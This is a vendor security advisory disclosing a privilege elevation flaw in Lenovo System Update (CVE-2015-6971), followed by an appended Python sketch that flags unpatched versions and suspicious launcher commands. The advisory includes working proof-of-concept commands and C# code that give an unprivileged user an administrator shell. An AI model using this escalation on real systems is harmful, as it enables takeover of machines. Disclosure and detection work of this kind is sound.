Trustwave SpiderLabs Security Advisory TWSL2015-018:
Service Privilege Elevation in Lenovo System Update 5

Published: 10/15/2015
Version: 1.0

Vendor: Lenovo (www.lenovo.com)
Product: Lenovo System Update
Version affected: Versions prior to 5.07.0013

Product description:
System Update Software by Lenovo

Finding 1: Privilege Elevation Vulnerability
Credit: Martin Rakhmanov of Trustwave
CVE: CVE-2015-6971

Lenovo System Update prior to 5.07.0013 allows unprivileged local users to elevate privileges to LocalSystem by submitting commands to the System Update Service. The service accepts and executes commands coming from certain signed Lenovo executables only. However, these executables can be launched and executed by unprivileged local users, making it possible to inject arbitrary code into them and bypass security checks that way.

One scenario would be to launch Lenovo Update and Drivers, then use a small helper application to attach to it and inject a DLL. The DLL will send commands to the System Update Service named pipe for subsequent execution as LocalSystem.

Proof of concept:

An unprivileged user can run:

    "C:\Program Files (x86)\Lenovo\System Update\ConfigService.exe" start
    echo test > C:\Users\Public\S.log
    "C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "C:\Program Files (x86)\Lenovo\System Update" /type COMMAND

At this point System Update GUI should be visible.
Now compile the following small program (copy UNCObject.dll from C:\Program Files (x86)\Lenovo\System Update\) and run it as the same unprivileged user:

    // csc.exe /r:UNCObject.dll /platform:x86 LSUS_SEPT2015.cs
    using System;
    using UNCRemoting;

    public class LSUS_SEPT2015
    {
        public static void Main(String[] args)
        {
            Connector connector = (Connector) Activator.GetObject(typeof(Connector), "tcp://localhost:20050/Connector");
            connector.DoEvent(UNCAction.LaunchIE, "cmd.exe");
        }
    }

A Command Prompt window running as Administrator is there now: the system is fully controlled by an unprivileged user.

Please note that IOActive reported a similar issue originally (CVE-2015-2219) but it was never properly patched and the issue is still exploitable via the method described above.

Remediation Steps:
Apply the 5.07.0013 update or the latest stable version of the Lenovo System Update software. Please note that Trustwave SpiderLabs have not verified this fix.

Revision History:
05/11/2015 - Vulnerability disclosed to vendor
09/17/2015 - Sent follow-up to vendor about incomplete fixes
10/14/2015 - Vendor releases fix in version 5.07.0013
10/15/2015 - Advisory published

References
1. https://support.lenovo.com/us/en/product_security/lsu_privilege

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries.
For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.

https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
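
Added example (not part of the Trustwave advisory and not Lenovo code): a Python sketch that checks inventory records against the fixed version 5.07.0013 named under Remediation Steps and flags the TvsuCommandLauncher.exe invocation from the proof of concept in process-creation records. The hostnames, users, installed versions, record layout, and the choice to treat launches by SYSTEM as expected are assumptions made for illustration.

```python
import re

FIXED_VERSION = "5.07.0013"  # first fixed release named in the advisory

def parse_version(text):
    """'5.07.0013' -> (5, 7, 13): compare fields as integers, never as strings."""
    fields = text.strip().split(".")
    if not all(f.isdigit() for f in fields):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(f) for f in fields)

def is_affected(installed, fixed=FIXED_VERSION):
    """True when the installed version is prior to the fixed one."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))  # pad so '5.7' compares as 5.7.0
    b += (0,) * (width - len(b))
    return a < b

# The launcher invocation shown in the proof of concept.
LAUNCH_RE = re.compile(r"TvsuCommandLauncher\.exe\"?\s.*/execute\s+uacsdk\.exe", re.IGNORECASE)
# Assumption: launches by these accounts are expected; tune to your baseline.
EXPECTED_USERS = {"NT AUTHORITY\\SYSTEM"}

def flag_launches(events):
    """Return (host, user) for matching launches by unexpected accounts."""
    return [(e["host"], e["user"]) for e in events
            if e["user"].upper() not in EXPECTED_USERS
            and LAUNCH_RE.search(e["cmdline"])]

# Constructed sample data: hostnames, users and versions are illustrative.
INVENTORY = {"ws-01": "5.06.0034", "ws-02": "5.07.0013", "ws-03": "5.07.9"}
EVENTS = [
    {"host": "ws-01", "user": "CORP\\alice",
     "cmdline": r'"C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe" '
                r'/execute uacsdk.exe /arguments "A1 A2" /type COMMAND'},
    {"host": "ws-02", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r'"C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe" '
                r'/execute uacsdk.exe /type COMMAND'},
    {"host": "ws-03", "user": "CORP\\bob", "cmdline": "notepad.exe"},
]

def report():
    affected = sorted(h for h, v in INVENTORY.items() if is_affected(v))
    return affected, flag_launches(EVENTS)

if __name__ == "__main__":
    print(report())
```

The constructed version "5.07.9" is the case a plain string comparison gets wrong: as text it sorts after "5.07.0013", but numerically it is an earlier build and still affected.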